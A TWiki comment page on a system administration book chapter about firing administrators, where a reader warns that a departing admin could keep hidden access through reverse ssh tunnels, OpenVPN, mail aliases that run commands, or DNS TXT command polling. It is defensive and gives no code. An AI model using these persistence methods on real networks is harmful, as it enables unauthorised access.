EditAttachPrintable
r2 - 11 Jan 2007 - 20:53:47 - ThomasLimoncelliYou are here: TWiki >  TPOSANA2 Web  > FiringSystemAdministratorsChapter
NO MORE UPDATES TO THIS PAGE PLEASE. SUBMIT ALL FUTURE COMMENTS TO tposana-bugs_at_wingfoot_org.gif

You mention backdoors in 31.2.2 but really this is a much more major problem. You say in 31.1.3 and 31.1.4 (pg 677) that the three tiers provide redundancy but it's not true. If you remove physical access, remote access and service access you may still be open to abuse.

eg a machine under a desk (or in a data center) that makes outgoing ssh connections via the webproxy to a remote machine and port forwards back from that machine to port 22. Or even makes an openVPN connection. The person now has remote access to your network. This backdoor could even run on a production server with an innocuous process name.

eg a .forward file or entry in mail aliases programmed to execute commands when a specially formatted email

eg a process that monitors a TXT RR of some DNS entry somewhere and executes commands found in it.

These possibilities scare me and I'd love it if you had a good way of solving these problems!

-- StephenHarris - 31 Aug 2006

Edit | Attach | Printable | Raw View | Backlinks: Web, All Webs | History: r2 < r1 | More topic actions
TPOSANA2
key Log In or Register
Log In or Register

Main Web Users Groups Index Search Changes Notifications Statistics Preferences

Webs AprilFoolsRFCs? EduResources? Main Sandbox TM2SA TPOSANA2 TWiki Log In or Register

Main Web Users Groups Index Search Changes Notifications Statistics Preferences

Webs AprilFoolsRFCs? EduResources? Main Sandbox TM2SA TPOSANA2 TWiki porn free porn

 
Powered by TWiki
This site is powered by the TWiki collaboration platformCopyright © by the contributing authors. All material on this collaboration platform is the property of the contributing authors.
Ideas, requests, problems regarding TWiki? Send feedback